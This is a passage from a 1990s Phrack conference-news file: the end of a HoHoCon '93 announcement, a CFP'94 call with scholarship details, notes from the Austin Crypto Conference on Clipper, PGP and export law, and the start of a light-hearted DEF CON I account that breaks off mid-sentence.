LOVE WAREZ The video includes footage from all three days, is six hours long and costs $18 plus $3 shipping ($4.00 if purchasing another item also). Please note that if you are purchasing multiple items, you only need to pay one shipping charge of $4.00, not a charge for each item. If you wish to send an order in now, make all checks or money orders payable to O.I.S., include your phone number and mail it to the street address listed below. Allow a few weeks for arrival. There will be new HoHoCon '93 shirts available at the conference and a video of the festivities will be out early next year. Correspondence -------------- If anyone requires any additional information, needs to ask any questions, wants to RSVP, wants to order anything, or would like to be added to the mailing list to receive the HoHoCon updates, you may mail us at: hohocon@cypher.com drunkfux@cypher.com cDc@cypher.com drunkfux@crimelab.com dfx@nuchat.sccsi.com drunkfux@5285 (WWIV Net) or via sluggo mail at: HoHoCon 1310 Tulane, Box 2 Houston, Texas 77008-4106 We also have a VMB which includes all the conference information and is probably the fastest way to get updated reports. The number is: 713-867-9544 You can download any of the conference announcements and related materials by calling Metalland Southwest at 713-468-5802, which is the offical HoHoCon BBS. The board is up 24 hours a day and all baud rates are supported. Those of you with net access can ftp to cypher.com and find all the HoHoCon information available in /pub/hohocon. The .gifs from previous cons are *not* currently online. Conference information and updates will most likely also be found in most computer underground related publications and mailing lists, including CuD, CSP, Mondo 2000, 2600, Phrack, TUC, phn0rd, cypherpunks, etc. They should also appear in a number of newsgroups including comp.dcom.telecom, alt.security, comp.org.eff.talk, and sci.crypt. We completely encourage people to use, reprint, and distribute any information in this file. Same stupid ending statement from last year to make us look good ---------------------------------------------------------------- HoHoCon '93 will be a priceless learning experience for professionals and gives journalists a chance to gather information and ideas direct from the source. It is also one of the very few times when all the members of the computer underground can come together for a realistic purpose. We urge people not to miss out on an event of this caliber, which doesn't happen very often. If you've ever wanted to meet some of the most famous people from the hacking community, this may be your one and only chance. Don't wait to read about it in all the magazines and then wish you had been there, make your plans to attend now! Be a part of what we hope to be our largest and greatest conference ever. ------------------------------------------------------------------------------- COMPUTERS, FREEDOM, AND PRIVACY '94 Conference Announcement Scholarships, Writing Competition Notice 23-26 March 1994, Chicago, Il. The fourth annual conference, "Computers, Freedom, and Privacy," (CFP'94) will be held in Chicago, Il., March 23-26, 1994. The conference is hosted by The John Marshall Law School; George B. Trubow, professor of law and director of the Center for Informatics Law at John Marshall, is general chair of the conference. The program is sponsored jointly by these Association for Computing Machinery (ACM) Special Interest Groups: Communications (SIGCOMM); Computers and Society (SIGCAS); Security, Audit and Control (SIGSAC). The advance of computer and communications technologies holds great promise for individuals and society. From conveniences for consumers and efficiencies in commerce to improved public health and safety and increased participation in government and community, these technologies are fundamentally transforming our environment and our lives. At the same time, these technologies present challenges to the idea of a free and open society. Personal privacy and corporate security is at risk from invasions by high-tech surveillance and monitoring; a myriad of personal information data bases expose private life to constant scrutiny; new forms of illegal activity may threaten the traditional barriers between citizen and state and present new tests of Constitutional protection; geographic boundaries of state and nation may be recast by information exchange that knows no boundaries in global data networks. CFP'94 will assemble experts, advocates and interest groups from diverse perspectives and disciplines to consider freedom and privacy in today's "information society. Tutorials will be offered on March 23, 1994, from 9:00 a.m. - noon and 2:00 - 500 p.m. The conference program is Thursday, March 24, through Saturday, March 26, 1994, and will examine the potential benefits and burdens of new information and communications technologies and consider ways in which society can enjoy the benefits while minimizing negative implications. STUDENT PAPER COMPETITION Full time college or graduate students may enter the student paper competition. Papers must not exceed 3000 words and should address the impact of computer and telecommunications technologies on freedom and privacy in society. Winners will receive financial support to attend the conference and present their papers. All papers should be submitted by December 15, 1993, (either as straight text via e-mail or 6 printed copies) to: Prof. Eugene Spafford, Department of Computer Science, Purdue University, West Lafeyette, IN 47907-2004. E-Mail: spaf@cs.purdue.edu; Voice: 317-494-7825 CONFERENCE REGISTRATION INFORMATION Registration fees are as follows: If paid by: 1/31/94 3/15/94 4/23/94 Early Regular Late Tutorial $145 $175 $210 Conference 315 370 420 NOTE: ACM members (give membership number) and John Marshall Alumni (give graduation date) receive a $10 discount from Tutorial and $15 discount from Conference fees. CONFERENCE REGISTRATION: Inquiries regarding registration should be directed to RoseMarie Knight, Registration Chair, at the JMLS address above; her voice number is 312-987-1420; E-mail, 6rknight@jmls.edu. CONFERENCE INFORMATION: Communications regarding the conference should be sent to: CFP'94, The John Marshall Law School, 315 S. Plymouth Ct., Chicago, IL 60604-3907 (Voice: 312-987-1419; Fax: 312-427-8307; E-mail: CFP94@jmls.edu) ROOM RESERVATIONS: The Palmer House Hilton, located in Chicago's "loop," and only about a block from The John Marshall Law School, is the conference headquarters. Room reservations only should be made directly with the hotel, mentioning "CFP'94" to get the special conference rate of $99.00, plus tax. (17 E. Monroe., Chicago, Il., 60603, Tel: 312-726-7500; 1-800-HILTONS; Fax 312-263-2556) NOTE: More specific information about conference program content will be available December 1, 1993. *********** George B. Trubow, Professor of Law Director, Center for Informatics Law The John Marshall Law School 315 S. Plymouth Ct. Chicago, IL 60604-3907 Fax: 312-427-8307; Voice: 312-987-1445 E-mail: 7trubow@jmls.edu ......SCHOLARSHIPS The Conference on Computers, Freedom & Privacy (CFP'94) is pleased to announce that it will once again provide a number of full tuition scholarships for attendance at the conference. The conference will be held in Chicago, IL from March 23rd through March 26th, 1995 and will be hosted by the John Marshall Law School under the chairmanship of George Trubow. The conference traditionally attracts an extremely diverse group of persons concerned with issues relating to the rapid development of the "information society"; civil libertarians, information providers, law enforcement personnel, privacy advocates, "hackers", sociologists, educators and students, computer professionals, cryptography advocates, government policy makers and other interested parties have all played major roles in the three previous conference. Speakers at previous conferences have included Electronic Frontier Foundation (EFF) co-founders John Perry Barlow and Mitch Kapor, FBI Deputy Director William A. "Al" Bayse, writer Bruce Sterling, privacy advocate Simon Davies, Harvard University law professor Lawrence Tribe, hacker "Phiber Optik", Georgetown University's Dorothy Denning, "Cuckoo's Egg" author Clifford Stoll, Prodigy counsel George Perry, USA Today founder Al Neuwith, former FCC Chairman Nicholas Johnson, Computer Professionals for Social Responsibility (CPSR)'s Marc Rotenberg, Arizona prosecutor Gail Thackeray, and Bay Area Women in Computing's Judi Clark. The scholarships are intended to provide access to the conference to those that would like to attend the conference but are unable to afford the tuition. They are available to undergraduate and graduate students in any discipline (previous student attendees have come from computer science, law, sociology, liberal arts, journalism, and womens' studies backgrounds), law enforcement personnel, hackers, social scientists, and others interested in the future of the information society. Persons interested in a scholarship should send the following information (e-mail greatly preferred) to: John F. McMullen Perry Street Jefferson Valley, NY 10535 mcmullen@panix.com (914) 245-2734 (voice) (914) 245-8464 (fax) 1. Personal Information -- Name, Addresses (including e-mail), Phone Numbers, School and/or Business Affiliation 2. Short Statement explaining what the applicant helps to get from CFP'94 and what impact that attendance may have in the applicant's community or future work. 3. Stipulation that the applicant understands that he/she is responsible for transportation and lodging expenses related to the conference. The scholarship includes tuition and those meals included with the conference. 4. Stipulation that the applicant would not be able to attend the conference if a scholarship is not granted. The applicant stipulates that, if granted a scholarship, he /she will attend the conference. 6. Stipulation that the applicant, if granted a scholarship, will provide a contact John McMullen at the above e-mail address or phone numbers with any questions. The number of available scholarships will be determined by funding available. ------------------------------------------------------------------------------- Notes from the Austin Crypto Conference, September 22, 1993 by Gregory W. Kamen --- Dinosaur Warning --- Disclaimer: A lot of people here noted disclaimed what they said as "not legal advice". In addition, this was prepared from notes which were not necessarily legible or complete, therefore I disclaim any responsibility for misquoting or mistranscribing this information. (If you don't like it, you try typing "cypherpunks" over and over again :P). Please note that in Q & A sessions, the answers were relevant, though not always responsive to the questions. In addition, I state that this information does not represent legal advice from me or solicitation of legal representation, and does not necessarily represent the position of EFH, EFF, EFF-Austin, the individual conference participants, or any living person. ----------- The room was set up to seat approximately 180 people. It was essentially full, and there were a few people standing--not bad for a Wednesday afternoon. There was a large (about 14 people) contingent from EFH present. Steve Jackson opened the meeting with a few introductory remarks, among which were that a subpoena had been served on Austin Code Works, a publisher of cryptographic software. We can expect to hear about the case in news magazines of general circulation in about two months. Bruce Sterling delivered the keynote address. He began by establishing a context by defining cryptography: -- as secret coding to avoid the scrutiny of a long list of entities, -- as a way to confine knowledge to those initiated and trusted, -- as a means to ensure the privacy of digital communication, and -- as a new form of information economics Sterling then noted that crypto is "out of the closet" -- it is heard of on the streets -- the government acknowledges it by bringing forth its Clipper chip -- it is in the hands of the people -- public key crypto is out there and commercially available -- the typical time to market from first publication of a new idea is 20 years. Diffie published the first public key crypto algorithm in 1975, thus the target date for mass crypto would be 1995. Bringing it to market will require bringing of political pressure, lawsuits, and money. Next, Sterling moved to the subject of the grand jury proceedings in San Jose on 9/22. -- Export law violations have been alleged. Whatever the outcome, this proceeding is certainly not the end of the subject. Finally, before closing by noting that EFF-Austin is not EFF, Sterling shared a brief background of the panelists: -- they are people who can tell us about the future -- they are directors of national EFF and can share information Panelists on First Panel -- Mitch Kapor - co-founder of EFF, software designer, entrepreneur, journalist, philanthropist, activist. He spoke out on obscure issues in the beginning and made them seem less obscure. He has done good deeds for the public. -- Jerry Berman - President of EFF, activist background, published widely on security and privacy issues, formerly active with ACLU, and is on Clinton administration's National Information Infrastructure team. Panelists on Second Panel -- Esther Dyson - journalist, has widely read project "Release 1.0", is a guru in Europe. -- Mike Godwin - lawyer for EFF, veteran public speaker, attended UT- Austin, on the board of EFF-Austin as well as EFF. Panelists on Third Panel -- Eric Hughes - not EFF member, started cypherpunks mailing list, from California -- John Gilmore - 20 year programmer, pioneer at Sun, civil libertarian -- John Perry Barlow - co-founder of EFF, media junkie, and author. PANEL #1: POLICY Kapor - Opening remarks: Framing the issue a. Series of conferences in Washington, briefed EFF on how laws are made, at a technical level of the process. Berman was instrumental in passing the ECPA, which was later used successfully in Steve Jackson Games case. b. ECPA is a good thing: it says Email should be as private as postal mail. However, it doesn't go far enough because it is easy to listen in on cell phones. c. Kapor felt need technology to protect privacy. Laws alone are not enough. Berman stated view (at that time. He has since changed his mind) widely held within the Beltway that laws were sufficient. d. Survey: 20 percent of those present use PGP. 80 percent have heard of PGP. Berman - a. Following on Kapor's point that ECPA was soft, Berman says the politicians will remain clueless until we educate them. If it is knowledge that can alter the political process, it must be done. b. EFF established a Washington presence because policy is being made to design and govern the electronic frontier by the big commercial players. The public and the consumer are not represented. c. We're working on a goal that the national information infrastructure serve the public interest. For example, if the big players are allowed to dominate the process, they will control access and the NII will look like 500 cable channels rather than a point-to-point switched network like Internet. d. There's a big battle coming: computers and communication are in abundance such that everyone can be a publisher. This raises at the very least a First Amendment issue. e. The Clipper Chip -- has great potential for the net; however, government agencies are not sure of control -- privacy and security are essential for development of the national information infrastructure. This is a threat to the law enforcement community. -- the response of the law enforcement community has been to attempt to throttle the technology. -- in order to capture the future, they want to develop the technology themselves. -- EFF's role has been to say that we shouldn't go ahead with the Clipper chip proposal. -- the ultimate big question: What to do when all communications are encrypted. -- Clinton led off with a study of cryptography policy and introduced the Clipper chip at the same time, which demonstrates that the policy was already determined in the opinions of many. It was introduced not as something being studied, but as a fait accompli. -- Clipper proposal is bad because it is based on a secret algorithm which has not been subjected to adequate scrutiny, it is counterintuitive to interoperability because stronger crypto is being developed outside the United States, and it includes a key escrow provision that includes only "insiders" who developed the technology. -- We don't prescreen the content of communications. The law enforcement community needs a warrant. That is fundamental to the First, Fourth, and Fifth Amendments. f. We oppose the Clipper/Skipjack chip -- there's no evidence showing that law enforcement will be unduly hampered in its efforts to stop crime if crypto is available. -- the positive and negative implications of widespread crypto have not been considered. -- law enforcement may have a problem, but if they have a warrant they should be able to get access. -- as long as Clipper is not mandated, people can use other types of crypto. g. Conclusions -- if Clipper is voluntary, it doesn't work, because people who want to encrypt safely will use other products. -- if Clipper is mandated, there are serious constitutional issues. -- Even if the Clipper chip proposal fails, we still lose under the current scheme, because the export control laws guarantee that we will not have crypto interoperable with the rest of the world. h. EFF chairs a large coalition including representatives of Microsoft, IBM, and ACLU to work against this. i. Congress only needs one bad case, like a terrorist attack, to go the other way. Q & A - Q. Is the key in the hardware or software with Clipper? A. It's in the hardware, therefore the instrument is permanently compromised once the keys are released from escrow. The law enforcement arguments are really fronts for NSA and their religious commitment to prevent the spread of crypto. It's NSA's mission to make sure it "busts" every communication in the world, therefore why would they propose any encryption without a "back door" through which they could decipher all transmissions. Q. What is the current state of the law between NIST and NSA? A. NSA was selling "secure" phones. They wanted a new classification of information. Responsibility for classified systems rests with NSA. NIST is brought in to handle domestic crypto. In terms of budget and experience, however, NSA is dominant, and NIST relies on them. Q. How does GATT relate to the Clipper proposal A. It's not dealt with in GATT. There's no agreement on an international standard. Q. What's going on with PGP? A. Pretty Good Privacy is the people's crypto. It was independently developed, and has been widely distributed for our information and security. There are two current controversies regarding PGP. First is whether it is subject to export controls, and second is its intellectual property status. Q. What facts do we have regarding the history of Clipper? A. The project began during the Bush administration after AT&T introduced phones implementing DES, the Data Encryption Standard. Clinton looked at it early in his administration. NSA pushed the program, and the staff wanted to "do something". A worst-case scenario about the introduction of Clipper is that it was leaked to the press, and the story about a study was cooked up to cover the leak. People might be surprised about how little expertise and thought about issues goes on. Policy makers operate under severe time constraints, handling the crisis of the moment. Most of them are reasonable people trying to do the best thing under the circumstances. If we push certain ideas long enough and hard enough we can affect the outcome. Q. Following the _AMD v. Intel_ case, there's nothing stating you cannot clone the Clipper chips to circumvent the law enforcement field, correct? A. It's difficult to say. The chips have not yet been delivered. There have been technical problems with the chip. At NIST hearing a couple weeks ago, Dorothy Denning revealed that she had reviewed the Skipjack algorithm alone because the other four cryptographers selected to review the algorithm were on vacation. There's a certain degree of cynicism because the government has said it will twist people's arms using its purchasing power and the threat of prosecution to establish Skipjack as a de facto standard. EFF is trying to get AT&T and Motorola to do something. Maybe the chip cannot easily be cloned. John Gilmore wants to see how easy it is to reverse engineer. Q. What are specific steps that can be taken? A. Send Email to the White House, and cc to EFF. Also, focus on the debate concerning ownership and leasing of the national information infrastructure. Southwestern Bell wants authority to own and lease the net and isn't quite sure whether government should be involved. This is the other longest-running EFF policy concern: the owner of the electronic highways shouldn't be able to control content. Bandwidth should be provided based on the principles of common carriage and universal access. Construction of the NII should be done by the private sector because government doesn't have the resources available. We can't allow ourselves to be limited to upstream bandwidth. The net should retain those of its characteristics equivalent to BBS's. Q. If NIST is to be an escrow agent, why are they not secure? A. This is a source of moral outrage, but moral outrage only goes so far. We need to swallow our distaste for dealing with the government to compromise. It is worthwhile to get involved in the decision-making _process_. Q. What is the position of the ACLU and Republican think tanks on Clipper? A. A lot of organizations have bumped into NII. ACLU is fighting the Clipper chip. For other organizations, it's not a top priority item. Q. With regard to DES: Export restrictions apply to scramblers, but they are exported anyway. Why this policy of selective enforcement? A. Don't look for consistency. SPA has recognized that there are 231 DES- equivalent products. The genie is out of the bottle. DES source is widely available, but more so inside the US than outside. Q. If the government has their way, what good products are out there for us? A. The government can only have its way by mandating use of Skipjack. If it holds up, legally and politically, there _is_ no alternative. The government is saying that it is considering banning the use of crypto other than Skipjack, but has not yet adopted such a policy. Q. If crypto is a munition, is it protected under the Second Amendment? A. The Second Amendment probably doesn't affect the export question. Q. Are there any legal weaknesses in the public key cryptography patents? A. EFF has its hands full with other issues and hasn't really formulated an answer to this, but believes there's a fatal weakness as to all software patents. However, it would be prohibitively expensive to make such a case at this time. Q. Do we need different copyright laws because of encryption? A. Recognize that without changes in the copyright law, it will be difficult to get a true net economy going. Producers want a way to make money from the net. Consumers want the equivalent of home taping. It's tough to cover all the bases. Q. How do law enforcement issues in civil cases relate? A. This is an interesting point because the line between a commercial dispute and a criminal act are fuzzy. There are dangers in obtaining a wiretap. The law enforcement community shouldn't have a case to tap a line in the event of a two-party dispute. There is a danger of misuse for traffic analysis of calls. Q. ECPA could have been used to regulate access to the airwaves. Has it been tested against the First Amendment? A. This demonstrates that technological security measures, rather than merely laws, are needed. People have listened to cell phone calls with scanners, and they made scanners illegal to manufacture, but cell phones can be modified to act as scanners. Experimentation of privacy with encryption shifts the balance. RSA is available outside the US. RICO is being overused. PANEL #2: INDUSTRIAL AND LEGAL ISSUES Dyson - Beyond commercial people being citizens, there are three big issues: 1. Protection of trade secrets 2. Intellectual property protection for net businesses and database information 3. Exporting encryption devices: US businesses like to do business overseas. It is cost ineffective to develop a US-only standard. There is better encryption available in Russia and Bulgaria on BBS's. Godwin - Talking about law enforcement arguments government makes. There are general issues regarding computers, communication, and privacy greater than just Clipper. -- Godwin is the first person people talk to when they call EFF in trouble. In addition to giving a lot of general information regarding liability, he monitors the intake of cases for EFF. He talks at conventions about criminal and constitutional issues. -- This effort has produced at least one change already: law enforcement personnel are no longer completely incompetent and clueless about computers. -- the most interesting are issues dealing with hackers and crypto. FBI's involvement with digital telephony: they wanted to make it more wiretap friendly. They discovered it is worthless without a restriction on encryption, and Clipper was introduced a short time later. Legal History The right to communications privacy is a fairly new thing. The Supreme Court faced it in the 1928 _Olmstead_ case, and held that there was no Fourth Amendment interest to be protected at all because there was no physical intrusion on the property. The doctrine has bee reveisited a number of times since then. -- a suction cup mike next door to the defendant's apartment produced the same holding. -- In a later case of a "spike mike" penetrating the heating duct of the defendant's apartment, the Court held that the Fourth Amendment applied but did not extend general Fourth Amendment protection. Finally in the _Katz_ case in the late 60's the Court formulated its present doctrine in holding that the defendant has a reasonable expectation of privacy in a phone booth. The Court said that the Fourth Amendment protects people, not places. Justice Brandeis, in dissent, cited Olmstead, but also noted that "The right most prized by civilized men is the right to be let alone." Arguments regularly advanced by law enforcement types in favor of Clipper: 1. Wiretapping has been essential in making many cases. -- this argument seems reasonable. 2. Even if they can't point to a case now, they are taking a proactive approach, trying to anticipate problems rather than reacting. -- Dorothy Denning was involved early on in framing the issues. Now she's in favor of the government line. Point is that an attitude of "us vs. them" is counterproductive. 3) There are nuclear terrorists out there -- this argument is the result of false reasoning. Like Pascal's wager, the price of guessing wrong is so high that the rational person chooses to be a believer, even where the probability is very low. -- the problem with it is that you can't live that way. There's not necessarily one single right answer. Also there is a substantial opportunity cost. Whenever you empower individual rights, there's a tradeoff against government efficiency. As an example, take the case of compelled confession. It would be very efficient for the government to be able to compel a confession, but the cost in individual rights is too high. There is no constitutional precedent on which to base the outlawing of encryption. The way it ought to be, the law enforcement types should have the right to try to intercept communications under certain circumstances, but they should have no guarantee of success. 4) Wiretapping has created an entitlement to have access to the communications: this argument is blatantly ridiculous. Q & A Q. Before the A-bomb was built, proponents said that it would cost $1 million to build. The eventual cost was $1 billion. Congress asked what was the probability that it could work, and was told 1 in 10. Thus the nuclear terrorist argument works, right? A. Terrorists won't use Clipper Q. NSA has had scramblers working. Why does it hurt for us to have the devices? A. We're not opening Pandora's Box. Encryption is already out there. They think the majority of communications are not encrypted now. Encryption will create a bottleneck, which will change the way law enforcement does its job. Q. What about the Davis case in Oklahoma? If convicted is there any chance for parole? A. Davis was a BBS owner prosecuted because he allegedly had obscene material on his board. I don't know about Oklahoma parole law. Q. What is the current legal status of PGP? A. That will be answered later. Q. If "only outlaws will have crypto", how effectively can the clamp down? A. It will probably be very easy for them to chill nonstandard crypto if -- they investigate for another crime and find it, or -- it may itself be probable cause for a search. Q. Doesn't a lot of this boil down to "you wouldn't be encrypting if you had nothing to hide"? A. There's not any probable cause for law enforcement taking that position. Business likes crypto. In a scenario where only certain types of crypto are allowed, there could presumably arise a presumption from nonstandard crypto. The more people who encrypt, the more will say it is all right. Q. Do you get the sense that there is a political will to protect privacy in this country? A. It is not clear that is the case. There is a real education hurdle to teach the importance of technology. Q. The law enforcement aspect is not important to NSA, right? A. The Russians and the Japanese have done more theoretical work. Read "The Puzzle Palace" Q. Virtual communities and net businesses need crypto on all systems to validate digital signatures. A. It is not required universally. It will become cheaper as digital signatures take off. The Clipper proposal does not address digital signatures. NIST is also talking to IRS about helping implement Clipper by extending the ability to file tax returns electronically to those using Clipper. Q. What restrictions are there right now on the IMPORT of crypto? A. None right now. Q. Is law enforcement misuse of commercial information anticipated? A. It is a wash. There are laws available to protect against such things, like the Electronic Funds Transfer laws, and also that the wiretap law requires eventual notification of the tap. That's why they have called for two escrow agents. The weakness is that people can be compromised. The answer to law enforcement is that you could have more than two escrow agents to make the bribe prohibitively expensive. Also the problem of human weakness is not unique to the Clipper chip or key escrow systems. Q. There's no mapping between the chip and the phone, correct? A. The only link is the word of the officer seeking a warrant. There is no provision right now for a database containing identities of all chips. Q. Can the President or Congress outlaw encryption by Executive Order? A. The president cannot by Executive Order. It's not clear whether Congress could constitutionally. Q. What about steganography? A. Steganography is defined as a message appearing to be unencrypted but containing a code. There's a constant competition between the law enforcement community and the criminal element to stay ahead on the technology. Q. Are one time pads illegal, or covered by export regulations? A. No. Few policymakers have ever heard of them. Q. What's a vision of what we would like to see? A. Try to give people a technological means to protect their own privacy. Freedom to exchange information. Communities conforming to a standard without oversight, so that we can export. Godwin - more mystical approach. In person, you can be sure of someone's identity. This creates intimacy. Technology has the potential to free intimacy from the accident of geography. With crypto, you know the identity of the other person, and that you're not being overheard. Q. Who are the law enforcement people you've been dealing with? Do they represent the highest levels of their organizations? A. (Godwin) I don't claim to know what NSA thinks. I have talked to FBI, state and local law enforcement authorities, and they all say the same things. PANEL #3: CYPHERPUNKS Barlow - Doesn't have the I/O bandwidth to be a cypherpunk. Doesn't know how they do it. The net is the biggest technological development since fire. There's a very difficult choice to be made, and it may already be made: Either anything is visible to anyone who is curious, or nothing is visible. Barlow comes from a small town. He's not bothered by privacy invasions at that level. But there's a difference between locals and the possessors of a database. The problem of giving up privacy (which without encryption will happen), is that it allows "them" to protect us from ourselves. Also, no matter how benevolent the current government may be, there will always be a corrupt one down the road. Hidden crypto economies could break most governments. It's not necessarily good to have no government either. What drives the cypherpunks is a law of nature: Anarchy is breaking out, and Barlow is one. However, the libertarian impulse begs a few questions about crypto: What are we trying to hide, from whom, and why? There are a lot of victimless crimes out there for which no one wants to take responsibility. Barlow wants crypto to create trust in identity. The real cypherpunk question is: The war is over, and we have won. How do we make the transition of power graceful? Human nature is to acquire some power structure of some kind. It is critical to acquaint friends and those who could care less with crypto. Gilmore - There are too many laws, and they make the wrong things illegal; We need to explain. In the existing system, the natural outgrowth has been for cypherpunks to be labeled as "them". Gilmore's vision is unprecedented mobility by creating privacy and authenticity at a distance. Thus you don't have to live near work, or play near home. By focusing on conspirators, the law enforcement community loses the focus on business use. The formal topic of the panel is cypherpunks. -- Crypto is not all that hard. Denning's book shows how to implement DES and RSA. -- Cypherpunks push the limits - taking cryptography from theory into the realm of the practical. -- Trying to put crypto in the hands of the people, so that the government cannot take it back. That's why PGP is freely distributed. -- Also working on anonymity and digital money schemes. The areas the cypherpunk group has worked on are: 1) Anonymity - anonymous Email. What is the impact on how we communicate? Most of the debate has been relatively uninformed. The Supreme Court thinks there is a right of anonymity. A Los Angeles law requiring that demonstrators who handed out flyers put their name and address on the flyers was overturned on the grounds that it chilled free speech. In other media, telephones are anonymous. There has been a big ruckus with Caller ID. The postal service does not enforce return address requirements. Telegrams and radio are similarly anonymous. 2) Privacy - Have been implementing key exchange systems for PGP, experimenting with encrypted audio. Digital cash systems - so many businesses would pop up on the net if it was possible to spend electronic money. There are people working on the legal aspects of it now. 3) Outreach - a mailing list, contributing articles to Village Voice, Wired, Whole Earth News. 4) Government interaction - Sent a list of questions regarding Clipper to NIST. Made several requests under the Freedom of Information Act. Someone searched the dumpsters at Mykotronx. In a recent FOIA request to an Assistant Secretary of Defense, we learned that the law enforcement and intelligence communities advocate making Clipper mandatory. There's a FOIA request in now on Clipper. FBI returned a clipping file, but says it will take 3 1/2 years to process and release all the documents requested. 5) Future projects - Building encrypted phones using PGP. Real digital banking. Automating anonymity and making an easier to use interface for anonymized mail. Tightening security from machine to machine protocols - Right now they transmit cleartext. At Gilmore's home machine at Cygnus recently, a hacker monitored a session remotely, then installed a daemon to monitor the first 200 bytes of ethernet traffic from each connection. The daemon was removed, and the problem fixed using kerberos. Hughes - Cypherpunks was created by Hughes and Tim May. It's surprising how much media attention we have gotten. They knew what they were doing was significant, but not that so many people thought so. They are now shooting a pilot for a TV show based on cypherpunks, and Hughes has held himself out as a media expert. Here are a few obvious things that nonetheless need to be stated: 1) In order to have a private key, you need to have your own CPU. To put your key online where someone else has physical access is dumb. Therefore, one of the consequences is that digital privacy is only for the rich. 2) Cypherpunks is not a "hacker privacy league", but rather seeks to ensure privacy for all. Crypto must be easy to use. It is just now feasible to have an anonymous remailer. The user interface _must_ be easy. The layperson's concept of security is that if the computer is not networked, it is secure. They don't see how much of a disadvantage it is not to be networked. Gibson calls non-networked computers "dead silicon". Therefore, encryption needs to be transparent to the user. The cypherpunks mailing list reached critical mass about 2 months ago with enough people understanding the concepts to move forward. We're at a crossroads historically now. 3) If you're the only one using crypto, it must be you who sent the cryptographic message. Anonymity is a social construct, and it doesn't work unless many people do it. The government is good at suppressing small things, but bad at suppressing big things. Therefore the best course of action is to spread the word. In the end, most of us will be private or most will not. If encryption is available to you, use it. In response to Dyson on the question of copyright: Copyright is dead, or at least moribund. It will not exist as we know it in 100 years. It is a means of using the government's power to suppress expression. You still will be able to sell the timeliness of information, indexing, delivery, etc. Gilmore - If we decide to be private, the only limit to secrecy is individual conscience. Comments from the audience: -- As it becomes less possible to hold on to information, marketing shifts toward a relationship rather than a product. -- If we want to make encryption easy, put out a mailer which supports it. (Response: We're working on it) Q & A Q. Can public keys be made available through the Domain Name Servers? A. PGP developers are working on it. Internet is an information motel. Data checks in, but it doesn't check out. Q. Is it possible to keep secrets at all? A. The larger an organization is, the tougher it is to keep a secret. Secrecy and digital signatures are not exactly related. One thing we may see if pointers to specific documents which contain self-verifying information. These will change the balance of power. Q. Can we sell strong crypto to Clinton as part of his national ID card for health care program? A. There's a problem in dealing with the administration right now, because they are currently defending a position and it will be tough to change. A parallel development may make the difference. Congress is getting Email. Seven or eight congressmen have access. A push to implement crypto to determine who is from the districts represented should come soon. A lot of this type application is based on the blind signature work of David Chaum. Q. What's the status with the legality of PGP vs. RSA? A. It is unsettled. There are two issues: patent infringement and export. RIPEM uses RSAREF, which is a watered down version of RSA. They're working on PGP using RSAREF for noncommercial users. Q. Compare the strength and security of PGP and RIPEM? A. PGP uses a longer key. RIPEM uses DES, but will probably go to Triple- DES. Q. How are blind signatures used? A. Voter cards, digital signatures, digital money. The government won't do it if they feel it's not in their best interest. Push it. Q. Can NSA break DES & PGP? A. Of course. Q. How long must a key be to slow NSA down? A. We estimate they can break one 512 bit RSA modulus per day. Q. Is PGP illegal, and if so, how? A. Patent infringement issue is whether PGP infringes RSA. If you use a product that infringes, you are civilly liable. If they were to enforce against a random user, worst case is that the user might be tied up in the courts for a while. Worse is copyright - it is a felony to engage in software piracy, which means making over 10 copies with a value over $2500. This poses a potential problem for sysadmins, and now companies use the threat of criminal charges to force licensing. Kapor is willing to take the case of whether or not there could ever be a valid software patent to the Supreme Court. Godwin says prosecutors will use other laws: Wire fraud, conspiracy, RICO. Hughes - there should be a local cypherpunks chapter. It should meet on the second Saturday of the month. Hughes is pursuing the idea of teleconferencing. Hughes concludes: "There's plenty of arguing to do. I'll see you online." ==Phrack Magazine== Volume Four, Issue Forty-Four, File 7 of 27 Conference News Part II **************************************************************************** xxxxxxxxxxxxxxxxxx xxx xx x xx DEF CON I, Las Vegas 1993 xxxxxxxXXXXxxxxxxxxxxxxx xx x x I'll attempt to give you guys xxxxxxXXXXXXxxxxx x x x the real deal on what happened. Since you xxxxxXXXXXXXXxxxxx xx x x most likely don't care about the whole xxxxXXXXXXXXXXxxx x xxxxxxxx x planning side of it I'll just talk about xxxXXXXXXXXXXXXxxxxxxxxxx x what happened of interest. xxXXXXXXXXXXXXXXxxxxxx xx x xxxXXXXXXXXXXXXxxxxxxxx I showed up at the Sands Hotel later than xxxxXXXXXXXXXXxxxxxxxx x x xx I thought, thanks to a delay at the xxxxxXXXXXXXXxxxxxxx xxx xx x airport and a ride on the slowest hotel xxxxxxXXXXXXxxxxxxx x x x shuttle known to mankind. It had to stop xxxxxxxXXXXxxxxxxxxxxx xx x x at every other hotel before it made it to xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x mine. Oh well. So I check in and go to check out the conference room, which happens to be right next to the conference planning room for the hotel. "Hmm, they will be gone for the weekend though, so we should be safe," I think as I wander into "The Burgundy Room" Sounds like a room in "Clue." Anyway there are like maybe six other people there. Dead Addict has been holding down the fort, and wanted to go get drinks so I set him free to frolic as I set up shop. I handed out tags to the people who had shown up and settled in for the duration. Someone had brought a cd player, so I put on a tape and got the music going. Red Five was there sporting scanners and radio gear, this guy had wires sticking out all over the place. "Good thing they turned to phones off," I say looking around the room happy that I wouldn't be stuck with a $31,312 phone call to Eastern Europe. "Yeah, we already checked that one," said one of the "hammies" gesturing to the phone jack I had seen. I notice a large cable running from the jack to a larger junction box at about the same time their eyes light up with glee. "Get the handset!," one says as another advances on the box with a tool kit that appeared out of thin air. "I'll need the ohm meter and some clips." the box is dismantled, and three people swarm it in a line testing frenzy. "No good on one.. two.. three.. got tone on four!" Great, I think, I'm fucked! "hhmm.. seems to be just the hotel, can't get an outside line.." This goes on for some time until I persuade them to stop fucking with the box and to do something else. They give up bored, and start exploring the rooms next to us finding a hallway that leads to a security camera monitoring the casino tables below. Some decide it's not cool to be recorded and return from there in a hurry, while others locate a travel agent's office and start grabbing a few things of no consequence. We grabbed two large easels holding large pads of paper for people to draw/write on. About this time the lady in charge of convention planning calls me to her office. "We got a call from the communications room. They said things were lighting up on their board that aren't supposed to be lighting up from your conference room. They say if it doesn't stop that you'll be thrown out of the hotel." Zowie. "OK, I got them to stop. They were just trying out their computer on the phone line to see if they could place a call," (Yeah, right) "but I'm sure it won't happen again." The assistant in the office spoke up and said something like, "Well, if you can clear my credit card I'm sure we wouldn't mind!" To which the main lady, Moreen, said "Yeah, my name is Moreen Robinson, and my Social Security number is..." What did they think? "Yeah, I'll get my credit erasers on it right away!"?? Back at the room things started to pick up. People came in throughout the day, and the bar downstairs was having a $1 margarita special. Someone bought twenty drinks for everyone (All right!) and 